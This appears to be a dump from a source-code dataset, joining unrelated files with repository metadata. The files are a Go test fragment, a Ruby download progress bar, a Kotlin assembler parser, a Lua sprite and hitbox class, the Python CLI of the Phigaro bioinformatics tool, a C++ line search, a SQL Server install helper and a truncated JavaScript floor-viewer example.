"foo/something": []byte("gnihtemos/oof"),
"bar/whatever/baz/stuff": []byte("data"),
"default/thing": []byte("defaulttopic"),
},
map[string]struct{}{
"foo/delete": struct{}{},
"bar/delete/baz/thing": struct{}{},
"default/delete": struct{}{},
},
map[string]types.Hash{
"state/": types.HexToHash("ff"),
},
)
for _, msg := range toTestResumptionMessage(msgs) {
if err := mp.ProcessMessage(msg); err != nil { t.Errorf(err.Error()) }
}
if err := mp.ProcessMessage(&testResumptionMessage{Message: p.Reorg(0, types.HexToHash("00")), offset: 19, source: "reorg"}); err != nil {
t.Errorf(err.Error())
}
if err := mp.ProcessMessage(&testResumptionMessage{Message: p.ReorgDone(0, types.HexToHash("00")), offset: 20, source: "reorg"}); err != nil {
t.Errorf(err.Error())
}
}
| 34.063158 | 154 | 0.607437 | 3 |
8eaac5799c4b40a970d0a2fa06742d97d7284f0e | 2,078 | rb | Ruby | lib/rmega/progress.rb | personal-social-media/rmega | 007041cb4d568f430cd8e385d86da1d20a86ac42 | [
"MIT"
] | 130 | 2015-01-28T22:32:43.000Z | 2022-03-26T17:40:32.000Z | lib/rmega/progress.rb | personal-social-media/rmega | 007041cb4d568f430cd8e385d86da1d20a86ac42 | [
"MIT"
] | 30 | 2015-07-06T14:02:36.000Z | 2022-01-18T07:29:51.000Z | lib/rmega/progress.rb | personal-social-media/rmega | 007041cb4d568f430cd8e385d86da1d20a86ac42 | [
"MIT"
] | 29 | 2015-02-15T09:56:57.000Z | 2022-03-13T22:03:26.000Z | module Rmega
class Progress
include Options
def initialize(total, options = {})
@total = total
@caption = options[:caption]
@bytes = 0
@real_bytes = 0
@mutex = Mutex.new
@start_time = Time.now
if show? and options[:filename]
puts options[:filename]
end
show
end
def show?
options.show_progress
end
def show
return unless show?
message = @caption ? "[#{@caption}] " : ""
message << "#{humanize_bytes(@bytes)} of #{humanize_bytes(@total)}"
if ended?
message << ". Completed in #{elapsed_time} sec.\n"
else
message << ", #{percentage}% @ #{humanize_bytes(speed, 1)}/s, #{options.thread_pool_size} threads"
end
print_r(message)
end
def stty_size_columns
return @stty_size_columns unless @stty_size_columns.nil?
@stty_size_columns ||= (`stty size`.split[1].to_i rescue false)
end
def columns
stty_size_columns || 80
end
def print_r(message)
if message.size + 10 > columns
puts message
else
blank_line = ' ' * (message.size + 10)
print "\r#{blank_line}\r#{message}"
end
end
def percentage
(100.0 * @bytes / @total).round(2)
end
def speed
@real_bytes.to_f / (Time.now - @start_time).to_f
end
def elapsed_time
(Time.now - @start_time).round(2)
end
def ended?
@total == @bytes
end
def increment(bytes, options = {})
@mutex.synchronize do
@caption = options[:caption] if options[:caption]
@bytes += bytes
@real_bytes += bytes unless options[:real] == false
show
end
end
def humanize_bytes(*args)
self.class.humanize_bytes(*args)
end
def self.humanize_bytes(bytes, round = 2)
units = ['bytes', 'kb', 'MB', 'GB', 'TB', 'PB']
e = (bytes == 0 ? 0 : Math.log(bytes)) / Math.log(1024)
value = bytes.to_f / (1024 ** e.floor)
return "#{value.round(round)} #{units[e]}"
end
end
end
| 21.873684 | 106 | 0.567372 | 3.25 |
f314715c9e3ac2b5283ead4b783012cbce9d8dd4 | 1,932 | kt | Kotlin | src/main/assembler/Parser.kt | Corithm/toy-computer | f682a1b5f0127c1f656bd22b7b49047f47570209 | [
"Apache-2.0"
] | null | null | null | src/main/assembler/Parser.kt | Corithm/toy-computer | f682a1b5f0127c1f656bd22b7b49047f47570209 | [
"Apache-2.0"
] | null | null | null | src/main/assembler/Parser.kt | Corithm/toy-computer | f682a1b5f0127c1f656bd22b7b49047f47570209 | [
"Apache-2.0"
] | null | null | null | package main.assembler
import java.io.BufferedReader
import java.io.FileReader
/**
* Parser implementation.
*
* p. 113 - 114
*/
class Parser(fileName: String)
{
private val reader: BufferedReader = BufferedReader(FileReader(fileName))
private var currentCommand: String? = null
val IGNORED: Int = 0
val A_COMMAND: Int = 1
val C_COMMAND: Int = 2
val L_COMMAND: Int = 3
/**
* Sets the next command.
*/
fun nextLine(): Boolean
{
currentCommand = reader.readLine()
if (currentCommand != null)
{
currentCommand = currentCommand!!.trim(' ')
}
return currentCommand != null
}
/** @return the command type */
fun commandType(): Int
{
if (currentCommand!!.length >= 2 && currentCommand!![0] == '/'&& currentCommand!![1] == '/')
{
return IGNORED
}
else if (currentCommand!!.length > 0)
{
return when (currentCommand!![0]) {
'@' -> A_COMMAND
'(' -> L_COMMAND
else -> C_COMMAND
}
}
return IGNORED
}
fun close() { reader.close() }
/** @return the symbol or decimal of A_COMMAND or L_COMMAND. */
fun symbolMnemonic() = currentCommand!!.substring(1).substringBefore(')')
/** @return the dest part of the code */
fun destMnemonic(): String
{
if (currentCommand!!.contains('='))
return currentCommand!!.substringBefore('=')
else
return "null"
}
/** @return the comp part of the code */
fun compMnemonic() = currentCommand!!.substringAfter('=').substringBefore(';')
/** @return the jump part of the code */
fun jumpMnemonic(): String {
if (currentCommand!!.contains(';'))
{
return currentCommand!!.substringAfter(';')
}
else return "null"
}
} | 23.851852 | 100 | 0.549172 | 3.234375 |
15c75b19508b0bf233e22734ecdab13f50ed18f0 | 2,683 | lua | Lua | Player.lua | Kraton9000/Ninja_Run | a745bbca0359f8325c5026d2babe55f640bd8a67 | [
"Adobe-2006",
"Adobe-Glyph"
] | null | null | null | Player.lua | Kraton9000/Ninja_Run | a745bbca0359f8325c5026d2babe55f640bd8a67 | [
"Adobe-2006",
"Adobe-Glyph"
] | null | null | null | Player.lua | Kraton9000/Ninja_Run | a745bbca0359f8325c5026d2babe55f640bd8a67 | [
"Adobe-2006",
"Adobe-Glyph"
] | null | null | null | require "30log-global"
Player = class("Player")
function Player:init(character, stance, stanceLimit, x, y, spriteSpeed, spriteTimer)
self.character = character
self.stance = stance
self.stanceLimit = stanceLimit
self.stanceCount = 1
self.x = x
self.y = y
self.spriteSpeed = spriteSpeed
self.spriteTimer = spriteTimer
self.sprite = love.graphics.newImage("Sprites/"..self.character..self.stance..self.stanceCount..".png")
self.width = self.sprite:getWidth()
self.height = self.sprite:getHeight()
self:updateHitbox()
end
function Player:updateStance(stance, stanceLimit)
if love.filesystem.exists("Hitboxes/".."OS"..self.character..self.stance..".txt") then
local offset = love.filesystem.read("Hitboxes/".."OS"..self.character..self.stance..".txt")
self.x = self.x + string.sub(offset, 1, 3)
self.y = self.y + string.sub(offset, 4, 6)
end
self.stance = stance
self.stanceLimit = stanceLimit
self.stanceCount = 0
local spriteLoop = self:incrementSprite()
self:updateHitbox()
if love.filesystem.exists("Hitboxes/".."OS"..self.character..self.stance..".txt") then
local offset = love.filesystem.read("Hitboxes/".."OS"..self.character..self.stance..".txt")
self.x = self.x - string.sub(offset, 1, 3)
self.y = self.y - string.sub(offset, 4, 6)
end
return spriteLoop
end
function Player:incrementSprite()
local spriteLoop = false
self.stanceCount = self.stanceCount + 1
if self.stanceCount > self.stanceLimit then
self.stanceCount = 1
end
local currentHeight = self.y + self.height
self.sprite = love.graphics.newImage("Sprites/"..self.character..self.stance..self.stanceCount..".png")
self.width = self.sprite:getWidth()
self.height = self.sprite:getHeight()
self.y = currentHeight - self.height
if self.stanceCount == self.stanceLimit then
spriteLoop = true
end
return spriteLoop
end
function Player:updateHitbox()
if love.filesystem.exists("Hitboxes/".."HB"..self.character..self.stance..self.stanceCount..".txt") then
local hitbox = love.filesystem.read("Hitboxes/".."HB"..self.character..self.stance..self.stanceCount..".txt")
self.hitX = self.x + string.sub(hitbox, 1, 3)
self.hitY = self.y + string.sub(hitbox, 4, 6)
self.hitWidth = self.width - string.sub(hitbox, 7, 9) - string.sub(hitbox, 1, 3)
self.hitHeight = self.height - string.sub(hitbox, 10, 12) - string.sub(hitbox, 4, 6)
else
self.hitX = self.x
self.hitY = self.y
self.hitWidth = self.width
self.hitHeight = self.height
end
end
function Player:hitTest(enemy)
return self.hitX < enemy.hitX + enemy.hitWidth and enemy.hitX < self.hitX + self.hitWidth and self.hitY < enemy.hitY + enemy.hitHeight and enemy.hitY < self.hitY + self.hitHeight
end | 35.773333 | 179 | 0.723444 | 3.28125 |
0cdb931bc3d4d0011e0c24642dc040bbe2b51af1 | 8,924 | py | Python | phigaro/cli/batch.py | bobeobibo/phigaro | 342a3454bb5324426b25feb4a4d1f640b58bf8f8 | [
"MIT"
] | 31 | 2019-03-06T14:33:37.000Z | 2022-03-08T07:16:07.000Z | phigaro/cli/batch.py | bobeobibo/phigaro | 342a3454bb5324426b25feb4a4d1f640b58bf8f8 | [
"MIT"
] | 27 | 2019-05-17T05:06:58.000Z | 2022-03-27T00:38:56.000Z | phigaro/cli/batch.py | bobeobibo/phigaro | 342a3454bb5324426b25feb4a4d1f640b58bf8f8 | [
"MIT"
] | 12 | 2017-08-23T12:48:38.000Z | 2021-06-24T00:57:22.000Z | from __future__ import absolute_import
import argparse
import logging
import multiprocessing
import os
import sys
import uuid
from os.path import join, exists
import yaml
from phigaro.context import Context
from phigaro.batch.runner import run_tasks_chain
from phigaro.batch.task.path import sample_name
from phigaro.batch.task.prodigal import ProdigalTask
from phigaro.batch.task.hmmer import HmmerTask
from phigaro.batch.task.dummy import DummyTask
from phigaro.batch.task.preprocess import PreprocessTask
from phigaro.batch.task.run_phigaro import RunPhigaroTask
from phigaro._version import __version__
def parse_substitute_output(subs):
subs = subs or []
res = {}
for sub in subs:
task_name, output = sub.split(":")
res[task_name] = DummyTask(output, task_name)
return res
def create_task(substitutions, task_class, *args, **kwargs):
# TODO: refactor to class Application
task = task_class(*args, **kwargs)
if task.task_name in substitutions:
print(
'Substituting output for {}: {}'.format(
task.task_name, substitutions[task.task_name].output()
)
)
return substitutions[task.task_name]
return task
def clean_fold():
is_empty = True
for root, dirs, files in os.walk('proc', topdown=False):
for name in files:
is_empty = False
break
if is_empty:
for name in dirs:
os.rmdir(os.path.join(root, name))
if is_empty:
os.rmdir('proc')
def main():
default_config_path = join(os.getenv('HOME'), '.phigaro', 'config.yml')
parser = argparse.ArgumentParser(
prog='phigaro',
description='Phigaro is a scalable command-line tool for predictions phages and prophages '
'from nucleid acid sequences',
)
parser.add_argument(
'-V',
'--version',
action='version',
version='%(prog)s {version}'.format(version=__version__),
)
parser.add_argument(
'-f',
'--fasta-file',
help='Assembly scaffolds/contigs or full genomes, required',
required=True,
)
parser.add_argument(
'-c',
'--config',
default=default_config_path,
help='Path to the config file, not required. The deafult is %s'%default_config_path,
)
parser.add_argument(
'-v', '--verbose', action='store_true', help=argparse.SUPPRESS
)
parser.add_argument(
'-p',
'--print-vogs',
help='Print phage vogs for each region',
action='store_true',
)
parser.add_argument(
'-e',
'--extension',
default=['html'],
nargs='+',
help='Type of the output: html, tsv, gff, bed or stdout. Default is html. You can specify several file formats with a space as a separator. Example: -e tsv html stdout.',
)
parser.add_argument(
'-o',
'--output',
default='',
help='Output filename for html and txt outputs. Required by default, but not required for stdout only output.',
)
parser.add_argument(
'--not-open',
help='Do not open html file automatically, if html output type is specified.',
action='store_true',
)
parser.add_argument(
'-t',
'--threads',
type=int,
default=multiprocessing.cpu_count(),
help='Num of threads ('
'default is num of CPUs={})'.format(multiprocessing.cpu_count()),
)
parser.add_argument(
'--no-cleanup', action='store_true', help="Do not delete any temporary files that was generated by Phigaro (HMMER & Prodigal outputs and some others)."
)
parser.add_argument(
'-S',
'--substitute-output',
action='append',
help='If you have precomputed prodigal and/or hmmer data you can provide paths to the files in the following format: program:address/to/the/file. In place of program you should write hmmer or prodigal. If you need to provide both files you should pass them separetely as two parametres.',
)
parser.add_argument(
'--save-fasta',
action='store_true',
help='Save all phage fasta sequences in a fasta file.',
)
parser.add_argument(
'-d',
'--delete-shorts',
action='store_true',
help='Exclude sequences with length < 20000 automatically.',
)
parser.add_argument(
'-m',
'--mode',
default='basic',
help='You can launch Phigaro at one of 3 modes: basic, abs, without_gc. Default is basic. Read more about modes at https://github.com/bobeobibo/phigaro/',
)
parser.add_argument(
'--wtp',
action='store_true',
help=argparse.SUPPRESS
)
args = parser.parse_args()
logging.basicConfig(level=logging.INFO if args.verbose else logging.WARN)
logging.getLogger('sh.command').setLevel(logging.WARN)
logger = logging.getLogger(__name__)
if not exists(args.config):
# TODO: pretty message
print('Please, create config file using phigaro-setup script')
exit(1)
args.extension = [atype.lower() for atype in args.extension]
for ext in args.extension:
if ext not in ['html', 'gff', 'bed', 'tsv', 'stdout']:
print(
'Error! The unknown output format in -e/--extensionn parameter: %s. Please, choose one or several from the list: html, gff, bed, tsv, stdout'%ext
)
exit(1)
if (args.output == '') and (args.extension != ['stdout']):
print(
'Error! Argument -o/--output is required or change the type of the output to stdout.'
)
exit(1)
with open(args.config) as f:
logger.info('Using config file: {}'.format(args.config))
config = yaml.load(f, Loader=yaml.FullLoader)
config['phigaro']['wtp'] = args.wtp
config['phigaro']['print_vogs'] = args.print_vogs
config['phigaro']['filename'] = args.fasta_file
config['phigaro']['no_html'] = (
True if 'html' not in args.extension else False
)
config['phigaro']['not_open'] = args.not_open
config['phigaro']['output'] = (args.output+'/'+os.path.splitext(os.path.basename(args.fasta_file))[0]+'.phigaro').replace('//', '/')
config['phigaro']['uuid'] = uuid.uuid4().hex
config['phigaro']['delete_shorts'] = args.delete_shorts
config['phigaro']['gff'] = True if ('gff' in args.extension) else False
config['phigaro']['bed'] = True if ('bed' in args.extension) else False
config['phigaro']['mode'] = args.mode
config['phigaro']['save_fasta'] = args.save_fasta
filename = args.fasta_file
sample = '{}-{}'.format(sample_name(filename), config['phigaro']['uuid'])
if args.wtp:
config['phigaro']['not_open'] = True
config['phigaro']['gff'] = True
config['phigaro']['bed'] = True
args.extension.append('tsv')
config['phigaro']['delete_shorts'] = True
config['phigaro']['print_vogs'] = True
config['phigaro']['output_wtp'] = args.output + '/phigaro.txt'
config['phigaro']['output'] = args.output +'/phigaro/phigaro'
config['phigaro']['save_fasta'] = True
if config['phigaro']['output'] != '':
fold = os.path.dirname(config['phigaro']['output'])
if fold and not os.path.isdir(fold):
os.makedirs(fold)
if args.wtp:
fold = os.path.dirname(config['phigaro']['output_wtp'])
if fold and not os.path.isdir(fold):
os.makedirs(fold)
Context.initialize(
sample=sample, config=config, threads=args.threads,
)
substitutions = parse_substitute_output(args.substitute_output)
preprocess_task = create_task(substitutions, PreprocessTask, filename)
prodigal_task = create_task(
substitutions, ProdigalTask, preprocess_task=preprocess_task
)
hmmer_task = create_task(
substitutions, HmmerTask, prodigal_task=prodigal_task
)
run_phigaro_task = create_task(
substitutions,
RunPhigaroTask,
prodigal_task=prodigal_task,
hmmer_task=hmmer_task,
)
tasks = [preprocess_task, prodigal_task, hmmer_task, run_phigaro_task]
task_output_file = run_tasks_chain(tasks)
if ('tsv' in args.extension) or ('stdout' in args.extension):
with open(task_output_file) as f:
f = list(f)
if 'tsv' in args.extension:
out_f = open(config['phigaro']['output'] + '.tsv', 'w')
for line in f:
out_f.write(line)
if 'stdout' in args.extension:
out_f = sys.stdout
for line in f:
out_f.write(line)
out_f.close()
if not args.no_cleanup:
for t in tasks:
t.clean()
clean_fold()
if __name__ == '__main__':
main()
| 33.174721 | 296 | 0.61766 | 3.15625 |
0bbd15397e2bf4ae4b6fd74045457ace7aa1b36b | 1,538 | js | JavaScript | components/content.js | isabella232/minidocs | 17b8b2527ad2e63f515e23101ed45325605f9d54 | [
"MIT"
] | 153 | 2016-03-27T07:56:56.000Z | 2022-03-12T23:33:14.000Z | components/content.js | freeman-lab/documentation-time | 44a9929c27595a6bea83dddec6f2ca45287bac70 | [
"MIT"
] | 67 | 2016-03-29T01:03:07.000Z | 2017-07-23T23:06:34.000Z | components/content.js | freeman-lab/documentation-time | 44a9929c27595a6bea83dddec6f2ca45287bac70 | [
"MIT"
] | 23 | 2016-03-27T17:43:20.000Z | 2018-11-30T14:06:17.000Z | var html = require('choo/html')
var css = require('sheetify')
var avatar = require('github-avatar-url')
module.exports = function (state, prev, send) {
var currentPage = state.params.page || state.current
var page = state.html[currentPage]
var pageData = state.contents.filter(function (item) {
return item.key === currentPage
})[0]
var prefix = css('./content.css')
var contentWrapper = html`<div></div>`
contentWrapper.innerHTML = page
var link = pageData.source ? html`<a class="markdown-link" href="${pageData.source}">source</a>` : ''
function contributors (items) {
return items.map(function (item) {
if (!item) return
var user = item.replace('@', '')
var img = html`<img class="${prefix} contributor"></img>`
img.style.opacity = 0
avatar(user, function (err, url) {
if (err) {
// TODO: handle requests in effects, send error messages to state
console.log(err)
}
img.src = url
img.onload = function () {
img.style.opacity = 1
}
})
return html`<div class="${prefix} contributor-wrapper">
<a href='https://github.com/${user}'>
${img}
</a>
</div>`
})
}
if (pageData.contributors) {
var contributorWrapper = html`<div class="${prefix} contributor-container">
${contributors(pageData.contributors)}
</div>`
}
return html`<div class="${prefix} minidocs-content">
${link}
${contributorWrapper}
${contentWrapper}
</div>`
}
| 27.963636 | 103 | 0.60013 | 3.03125 |
93e7bde25b19b5c699d99e5b1d8d5281dccfd8f9 | 2,645 | sql | SQL | source/setup/install-get-instance-info.sql | rentadba/dbaTDPMon | 278b43db2f01c5b0fb2db4dbff8e0c49fb3471b2 | [
"MIT"
] | 31 | 2017-04-06T18:12:10.000Z | 2022-02-28T11:08:41.000Z | source/setup/install-get-instance-info.sql | rentadba/dbaTDPMon | 278b43db2f01c5b0fb2db4dbff8e0c49fb3471b2 | [
"MIT"
] | 1 | 2020-04-27T04:39:27.000Z | 2020-06-19T11:34:51.000Z | source/setup/install-get-instance-info.sql | rentadba/dbaTDPMon | 278b43db2f01c5b0fb2db4dbff8e0c49fb3471b2 | [
"MIT"
] | 10 | 2017-09-25T11:32:57.000Z | 2021-09-10T11:11:50.000Z | -- ============================================================================
-- Copyright (c) 2004-2017 Dan Andrei STEFAN ([email protected])
-- ============================================================================
SET QUOTED_IDENTIFIER ON
GO
SET NOCOUNT ON
GO
DECLARE @dataFilePath [nvarchar](260)
, @logFilePath [nvarchar](260)
, @serverVersionStr [sysname]
, @serverVersionNum [numeric](9,6)
, @hostPlatform [sysname]
, @queryToRun [nvarchar](512)
SELECT @serverVersionStr = CAST(SERVERPROPERTY('ProductVersion') AS [sysname])
PRINT 'productVersion=' + CAST(SERVERPROPERTY('ProductVersion') AS [sysname])
PRINT 'engineVersion=' + SUBSTRING(@serverVersionStr, 1, CHARINDEX('.', @serverVersionStr)-1)
SET @serverVersionNum=SUBSTRING(@serverVersionStr, 1, CHARINDEX('.', @serverVersionStr)-1) + '.' + REPLACE(SUBSTRING(@serverVersionStr, CHARINDEX('.', @serverVersionStr)+1, LEN(@serverVersionStr)), '.', '')
IF @serverVersionNum >= 14
begin
SET @queryToRun = N'SELECT [host_platform] FROM sys.dm_os_host_info'
IF object_id('tempdb..#tmpOutput') IS NOT NULL
DROP TABLE #tmpOutput
CREATE TABLE #tmpOutput
(
[output] [nvarchar](512) NULL
)
INSERT INTO #tmpOutput([output])
EXEC sp_executesql @queryToRun
SELECT @hostPlatform = LOWER([output])
FROM #tmpOutput
end
SET @dataFilePath = REPLACE('$(data_files_path)', '"', '')
SET @logFilePath = REPLACE('$(data_files_path)', '"', '')
IF NOT (@serverVersionNum >= 14 AND @hostPlatform='linux' )
begin
/* try to read default data and log file location from registry */
IF ISNULL(@dataFilePath, '')=''
EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE'
, N'Software\Microsoft\MSSQLServer\MSSQLServer'
, N'DefaultData'
, @dataFilePath output;
IF ISNULL(@logFilePath, '')=''
EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE'
, N'Software\Microsoft\MSSQLServer\MSSQLServer'
, N'DefaultLog'
, @logFilePath output;
end
IF ISNULL(@dataFilePath, '')='' OR ISNULL(@logFilePath, '')=''
begin
RAISERROR('*-----------------------------------------------------------------------------*', 10, 1) WITH NOWAIT
RAISERROR('Database Default Locations are not set for current SQL Server instance. You must provide them to the install utility.', 16, 1) WITH NOWAIT
end
ELSE
begin
IF RIGHT(@dataFilePath, 1)<>'\' SET @dataFilePath = @dataFilePath + '\'
IF RIGHT(@logFilePath, 1)<>'\' SET @logFilePath = @logFilePath + '\'
PRINT 'dataFilePath="' + @dataFilePath + '"'
PRINT 'logFilePath="' + @logFilePath + '"'
end
GO
| 36.232877 | 207 | 0.623062 | 3.28125 |
e8ff9e109d1e3411f4ef5d970014c1908546fefe | 6,168 | py | Python | support/update_dht_servers.py | sonofmom/ton-zabbix-scripts | b43471d058873c5ba78a92fa79d334380df5f6fc | [
"MIT"
] | null | null | null | support/update_dht_servers.py | sonofmom/ton-zabbix-scripts | b43471d058873c5ba78a92fa79d334380df5f6fc | [
"MIT"
] | null | null | null | support/update_dht_servers.py | sonofmom/ton-zabbix-scripts | b43471d058873c5ba78a92fa79d334380df5f6fc | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
#
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
import argparse
import Libraries.arguments as ar
import Libraries.tools.general as gt
import Libraries.tools.zabbix as zt
import Classes.AppConfig as AppConfig
import requests
import copy
def run():
description = 'Fetches list of dht servers from network config and performs sync with zabbix'
parser = argparse.ArgumentParser(formatter_class = argparse.RawDescriptionHelpFormatter,
description = description)
ar.set_standard_args(parser, "other")
cfg = AppConfig.AppConfig(parser.parse_args())
stats = {
"nodes": 0,
"hosts_known": 0,
"hosts_updated": 0,
"hosts_added": 0,
"hosts_disabled": 0
}
cfg.log.log(os.path.basename(__file__), 3, "Fetching network config.")
try:
rs = requests.get(cfg.config["configs"]["global_public"]).json()
except Exception as e:
cfg.log.log(os.path.basename(__file__), 1, "Could not retrieve network config: " + str(e))
sys.exit(1)
if len(rs["dht"]["static_nodes"]["nodes"]) > 0:
nodes = {}
# We identify DHT nodes by ip:port combination
#
for element in rs["dht"]["static_nodes"]["nodes"]:
nodes["{}.{}".format(gt.dec2ip(element["addr_list"]["addrs"][0]["ip"]),element["addr_list"]["addrs"][0]["port"])] = element
else:
cfg.log.log(os.path.basename(__file__), 1, "Network config contains no nodes")
sys.exit(1)
stats["nodes"] = len(nodes)
cfg.log.log(os.path.basename(__file__), 3, "Retrieved {} DHT servers.".format(stats["nodes"]))
cfg.log.log(os.path.basename(__file__), 3, "Fetching list of hosts in zabbix.")
rs = zt.fetch_hosts(cfg, [cfg.config["mapping"]["groups"]["ton_public_dht_servers"]])
if rs is None:
cfg.log.log(os.path.basename(__file__), 1, "Could not fetch list of hosts.")
sys.exit(1)
# Again, we identify hosts by ip:port
hdata = {}
for element in rs:
port = next((chunk for chunk in element["macros"] if chunk["macro"] == "{$DHT.PORT}"), None)
if port:
hdata["{}.{}".format(element["interfaces"][0]["ip"], port["value"])] = element
stats["hosts_known"] = len(hdata)
cfg.log.log(os.path.basename(__file__), 3, "Retrieved {} hosts.".format(stats["hosts_known"]))
# Scan nodes from network config, add or update key as needed
#
for element in nodes:
if element not in hdata:
if nodes[element]["addr_list"]["addrs"][0]["ip"] != 2130706433:
cfg.log.log(os.path.basename(__file__), 3, "Adding node {}.".format(element))
rs = add_node(cfg,nodes[element])
if not rs:
cfg.log.log(os.path.basename(__file__), 1, "Could not add host.")
sys.exit(1)
stats["hosts_added"] += 1
else:
host = copy.deepcopy(hdata[element])
key = next((chunk for chunk in host["macros"] if chunk["macro"] == "{$DHT.KEY}"), None)
if not key or key["value"] != nodes[element]["id"]["key"]:
zt.set_macro(host["macros"], "{$DHT.KEY}", str(nodes[element]["id"]["key"]))
if host != hdata[element]:
cfg.log.log(os.path.basename(__file__), 3, "Updating node {}.".format(element))
zt.update_host(cfg, host, hdata[element])
stats["hosts_updated"] += 1
# Scan nodes from zabbix, remove if unknown
#
for host in hdata:
if host not in nodes:
zt.delete_host(cfg, hdata[host])
sys.exit(0)
def add_node(cfg, server_data):
cfg.log.log(os.path.basename(__file__), 3, "Adding host with KEY {}".format(server_data["id"]["key"]))
groups = [
cfg.config["mapping"]["groups"]["ton_public_dht_servers"]
]
templates = [
cfg.config["mapping"]["templates"]["ton_dht_server"]
]
payload = {
"jsonrpc": "2.0",
"method": "host.create",
"params": {
"host": "TON DHT node {}.{}".format(gt.dec2ip(server_data["addr_list"]["addrs"][0]["ip"]),server_data["addr_list"]["addrs"][0]["port"]),
"interfaces":
[
{
"type": 1,
"main": 1,
"useip": 1,
"ip": gt.dec2ip(server_data["addr_list"]["addrs"][0]["ip"]),
"dns": "",
"port": "10050"
}
],
"tags": [
{
"tag": "c_network",
"value": cfg.config["net"]
},
{
"tag": "c_stage",
"value": "prod"
},
{
"tag": "c_origin",
"value": "dht_sync"
}
],
"macros":
[
{
"macro": "{$DHT.KEY}",
"value": server_data["id"]["key"]
},
{
"macro": "{$DHT.PORT}",
"value": str(server_data["addr_list"]["addrs"][0]["port"])
},
{
"macro": "{$UPDATED}",
"value": str(gt.get_timestamp())
}
],
"groups": [],
"templates": []
},
"auth": cfg.config["zabbix"]["api_token"],
"id": 1
}
for element in groups:
payload["params"]["groups"].append({"groupid": element})
for element in templates:
payload["params"]["templates"].append({"templateid": element})
rs = zt.execute_api_query(cfg, payload)
if not rs:
cfg.log.log(os.path.basename(__file__), 1, "Failed to add host with KEY {}".format(server_data["id"]["key"]))
sys.exit(1)
return rs["result"]["hostids"][0]
if __name__ == '__main__':
run()
| 35.245714 | 148 | 0.50989 | 3.03125 |
5fdc0fbffb5e43fca9e409204dc1c6d3691508eb | 1,978 | h | C | frees/search.h | fenollp/lk | 14ed9cb1997906c9af2711ce03ce07b31c284349 | [
"BSD-3-Clause"
] | 24 | 2017-08-01T16:13:28.000Z | 2021-08-29T13:13:29.000Z | frees/search.h | fenollp/lk | 14ed9cb1997906c9af2711ce03ce07b31c284349 | [
"BSD-3-Clause"
] | 10 | 2017-07-13T17:31:21.000Z | 2021-06-18T21:32:15.000Z | frees/search.h | fenollp/lk | 14ed9cb1997906c9af2711ce03ce07b31c284349 | [
"BSD-3-Clause"
] | 26 | 2017-09-17T00:29:31.000Z | 2022-03-17T04:25:54.000Z |
template< typename Real, typename F >
Real fminsum ( Real *x, Real *f, const int n, F &func )
{
Real sum=0;
func(x, f, n);
for (int i=0;i<n;i++)
sum += f[i]*f[i];
return 0.5*sum;
}
template< typename Real, typename F >
bool search( Real *xold, const Real fold, Real *g, Real *p,
Real *x, Real &f, const Real stpmax, bool &check, F &func, Real *fvec,
const int n)
{
const Real ALF=1.0e-4, TOLX = std::numeric_limits<Real>::epsilon();
Real a,alam,alam2=0.0,alamin,b,disc,f2=0.0;
Real rhs1,rhs2,slope=0.0,sum=0.0,temp,test,tmplam;
int i;
check = false;
for (i=0;i<n;i++)
sum += p[i]*p[i];
sum=sqrt(sum);
if (sum > stpmax)
for (i=0;i<n;i++)
p[i] *= stpmax/sum;
for (i=0;i<n;i++)
slope += g[i]*p[i];
if (slope >= 0.0)
return false;
test=0.0;
for (i=0;i<n;i++)
{
temp=fabs(p[i])/mymax(fabs(xold[i]),1.0);
if (temp > test) test=temp;
}
alamin=TOLX/test;
alam=1.0;
int niter = 0;
int niter_max = 5000;
while (niter++ < niter_max)
{
for (i=0;i<n;i++)
x[i]=xold[i]+alam*p[i];
f = fminsum<Real, F>( x, fvec, n, func );
if ( (f) != (f) )
return false;
if (alam < alamin)
{
for (i=0;i<n;i++) x[i]=xold[i];
check=true;
return true;
}
else if (f <= fold+ALF*alam*slope)
{
return true;
}
else
{
if (alam == 1.0)
{
tmplam = -slope/(2.0*(f-fold-slope));
}
else
{
rhs1=f-fold-alam*slope;
rhs2=f2-fold-alam2*slope;
a=(rhs1/(alam*alam)-rhs2/(alam2*alam2))/(alam-alam2);
b=(-alam2*rhs1/(alam*alam)+alam*rhs2/(alam2*alam2))/(alam-alam2);
if (a == 0.0)
{
tmplam = -slope/(2.0*b);
}
else
{
disc=b*b-3.0*a*slope;
if (disc < 0.0) tmplam=0.5*alam;
else if (b <= 0.0) tmplam=(-b+sqrt(disc))/(3.0*a);
else tmplam=-slope/(b+sqrt(disc));
}
if (tmplam>0.5*alam)
tmplam=0.5*alam;
}
}
alam2=alam;
f2 = f;
alam=mymax(tmplam,0.1*alam);
}
if (niter == niter_max) return false;
return true;
}
| 18.660377 | 73 | 0.545501 | 3.40625 |
9bcbc2d477d9df313e29b83b597bdeb68ddfb426 | 3,786 | js | JavaScript | examples/plain-js/index.js | RoamDirectories/ioffice-floor-viewer-sdk | f3af7696dec986d3d3c9f2c9401093dfaee0c02d | [
"MIT"
] | null | null | null | examples/plain-js/index.js | RoamDirectories/ioffice-floor-viewer-sdk | f3af7696dec986d3d3c9f2c9401093dfaee0c02d | [
"MIT"
] | null | null | null | examples/plain-js/index.js | RoamDirectories/ioffice-floor-viewer-sdk | f3af7696dec986d3d3c9f2c9401093dfaee0c02d | [
"MIT"
] | null | null | null | // Utility objects to interact with the DOM
var ping = {};
var select = {};
var setMarkers = {};
/**
* Return an object containing the query parameters.
*/
function getQueryParams() {
var url = window.location.href;
var query = {};
var params = url.substr(url.lastIndexOf('?') + 1).split('&');
params.forEach(function (item) {
var col = item.split('=');
query[decodeURIComponent(col[0])] = decodeURIComponent(col[1]);
});
return query;
}
/**
* Wrapper function to obtain the user credentials based on the username/password or oauth token.
* Failure to provide those query parameters will throw an error.
*
* @param query An object containing the query parameters.
*/
function getUserCredentials(query) {
var credentials = {};
if (query.token) {
credentials = {
'x-access-token': query.token,
};
} else {
throw Error('missing user credentials, provide either [user, pass] or [token] queries.');
}
return credentials;
}
/**
* Entry point for the program to execute once the DOM is loaded.
*/
function main() {
var query = getQueryParams();
var sdk = new FloorViewerSDK({
siteUrl: query.siteUrl,
accessHeaders: getUserCredentials(query),
floorId: query.floorId,
container: 'fv-container',
});
sdk.onReady().then(function () {
sdk.getVersion().then(function (version) {
console.log('Using VERSION:', version);
});
sdk.addMarkers(markers).then(function (ids) {
